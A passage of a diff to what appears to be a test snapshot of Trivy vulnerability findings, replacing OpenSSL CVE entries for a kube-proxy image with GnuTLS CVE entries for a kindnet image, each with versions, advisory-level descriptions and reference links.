"https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", + "https://access.redhat.com/security/cve/CVE-2021-20232", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20232.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", ], }, "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "the c_rehash script allows command injection", + "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://avd.aquasec.com/nvd/cve-2021-20232", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", + "value": "https://access.redhat.com/security/cve/CVE-2021-20232", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-24659", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", + "https://access.redhat.com/security/cve/CVE-2020-24659", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", + "https://gitlab.com/gnutls/gnutls/-/issues/1071", + "https://linux.oracle.com/cve/CVE-2020-24659.html", + "https://linux.oracle.com/errata/ELSA-2020-5483.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "https://security.gentoo.org/glsa/202009-01", + "https://security.netapp.com/advisory/ntap-20200911-0006/", + "https://ubuntu.com/security/notices/USN-4491-1", + "https://usn.ubuntu.com/4491-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", ], }, "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", + "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://avd.aquasec.com/nvd/cve-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://access.redhat.com/security/cve/CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://security.gentoo.org/glsa/202009-01", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://ubuntu.com/security/notices/USN-4491-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://usn.ubuntu.com/4491-1/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2509", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6854", + "https://access.redhat.com/security/cve/CVE-2022-2509", + "https://bugzilla.redhat.com/2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "https://errata.rockylinux.org/RLSA-2022:6854", + "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "https://linux.oracle.com/cve/CVE-2022-2509.html", + "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "https://www.debian.org/security/2022/dsa-5203", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Double free during gnutls_pkcs7_verify", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://avd.aquasec.com/nvd/cve-2022-2509", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://access.redhat.com/errata/RHSA-2022:6854", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://access.redhat.com/security/cve/CVE-2022-2509", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://bugzilla.redhat.com/2108977", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://errata.rockylinux.org/RLSA-2022:6854", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.debian.org/security/2022/dsa-5203", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u10", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0361", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - 